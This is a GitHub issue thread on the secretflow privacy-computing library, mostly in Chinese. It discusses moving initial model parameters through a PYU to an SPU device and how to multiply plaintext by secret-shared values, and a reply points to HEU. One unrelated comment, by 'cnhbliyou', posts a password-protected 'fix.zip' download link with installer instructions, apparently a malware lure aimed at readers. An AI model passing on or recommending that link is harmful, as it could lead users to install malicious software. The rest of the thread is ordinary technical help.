### ISSUE TITLE
关于secretflow的使用的一些问题。

### ISSUE THREAD

**Issue by TY-cc** [secretflow/secretflow#1452]
### Issue Type

Others

### Source

binary

### Secretflow Version

secretflow     1.8.0b0

### OS Platform and Distribution

CentOS Linux release 7.9.2009 (Core)

### Python version

Python 3.10.4

### GCC/Compiler version

gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44)

### What happend and What you expected to happen.

```shell
并不是bug问题，而是在理解和使用上的问题。
代码样例理解上的问题：
在https://secretflow.readthedocs.io/zh-cn/stable/tutorial/nn_with_spu.html的用例当中，使用spu的训练模型部分的代码如下
import secretflow as sf

# Check the version of your SecretFlow
print('The version of SecretFlow: {}'.format(sf.__version__))

# In case you have a running secretflow runtime already.
sf.shutdown()

sf.init(['alice', 'bob'], address='local')

alice, bob = sf.PYU('alice'), sf.PYU('bob')
spu = sf.SPU(sf.utils.testing.cluster_def(['alice', 'bob']))

x1, _ = alice(breast_cancer)(party_id=1, train=True)
x2, y = bob(breast_cancer)(party_id=2, train=True)
init_params = model_init(n_batch)


device = spu
x1_, x2_, y_ = x1.to(device), x2.to(device), y.to(device)
init_params_ = sf.to(alice, init_params).to(device)

params_spu = spu(train_auto_grad, static_argnames=['n_batch', 'n_epochs', 'step_size'])(
    x1_, x2_, y_, init_params_, n_batch=n_batch, n_epochs=n_epochs, step_size=step_size
)

我比较好奇的是'init_params_ = sf.to(alice, init_params).to(device)'这句代码的目的是什么？
我个人理解是将模型的初始参数先传到pyu中，然后再传到spu当中，不知道我的理解是否正确？

另外关于理解问题：如何进行一个明文与密文的乘法？
我对PYU和SPU的理解，是用来执行数据运算的'机器'，不过PYU执行的明文数据计算，SPU负责密文，不知道这个理解是否有误。如果是这样的话，那么如果要计算一个明文数据和密文数据之间的计算，这个计算要在哪个‘机器’上执行？
就具体案例来说，alice和bob构成SPU设备，共享了整数c。此时c分片为<c_0>，<c_1>。但是如果我想计算k*<c_0>与k*<c_1>。这个在哪里计算呢？
```

### Reproduction code to reproduce the issue.

```shell
涉及的代码如下部分
import secretflow as sf

# Check the version of your SecretFlow
print('The version of SecretFlow: {}'.format(sf.__version__))

# In case you have a running secretflow runtime already.
sf.shutdown()

sf.init(['alice', 'bob'], address='local')

alice, bob = sf.PYU('alice'), sf.PYU('bob')
spu = sf.SPU(sf.utils.testing.cluster_def(['alice', 'bob']))

x1, _ = alice(breast_cancer)(party_id=1, train=True)
x2, y = bob(breast_cancer)(party_id=2, train=True)
init_params = model_init(n_batch)


device = spu
x1_, x2_, y_ = x1.to(device), x2.to(device), y.to(device)
init_params_ = sf.to(alice, init_params).to(device)

params_spu = spu(train_auto_grad, static_argnames=['n_batch', 'n_epochs', 'step_size'])(
    x1_, x2_, y_, init_params_, n_batch=n_batch, n_epochs=n_epochs, step_size=step_size
)
```

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lanyy9527** [comment]
1. 代码的目的是将模型初始参数 init_params 传递给 alice 方（PYU），然后将 Alice (PYU) 传递到 SPU 设备上；
2. 可以这么理解
3. 在SPU中执行；（PYU负责处理各自的本地数据；SPU主要负责处理安全的多方计算，确保各方的数据在计算过程中是密文的；涉及到多方联合计算时，需要将数据通过PYU传递到SPU，然后在SPU中进行加密计算；）

**Comment by TY-cc** [comment]
感谢回复，1.2问题已解决。
针对第3条回复，如果把一个明文数据传递到SPU，那不是会把明文整数进行秘密分析么？
具体来说就是，alice和bob两台机器构成了SPU。当把c上传到SPU上时，c被秘密共享为<c_0>，<c_1>。然后目标是alice与bob分别计算k*<c_0>与k*<c_1>(普通乘法)。但是如果把k传递到SPU，那k也秘密共享为<k_0>，<k_1>。此时alice与bob计算会分别变成<k_0>*<c_0>与<k_1>*<c_1>(秘密共享乘法)。
不知道我的理解是否有误？如果是我说的这种情况，那么如何避免这种情况(即计算普通乘法自动转变为计算秘密共享乘法)？

**Comment by lanyy9527** [comment]
> 感谢回复，1.2问题已解决。 针对第3条回复，如果把一个明文数据传递到SPU，那不是会把明文整数进行秘密分享么？ 具体来说就是，alice和bob两台机器构成了SPU。当把c上传到SPU上时，c被秘密共享为<c_0>，<c_1>。然后目标是alice与bob分别计算k*<c_0>与k*<c_1>(普通乘法)。但是如果把k传递到SPU，那k也秘密共享为<k_0>，<k_1>。此时alice与bob计算会分别变成<k_0>_<c_0>与<k_1>_<c_1>(秘密共享乘法)。 不知道我的理解是否有误？如果是我说的这种情况，那么如何避免这种情况(即计算普通乘法自动转变为计算秘密共享乘法)？

可使用heu，参考：https://www.secretflow.org.cn/zh-CN/docs/heu/v0.5.1b0/getting_started/quick_start

**Comment by TY-cc** [comment]
感谢回复
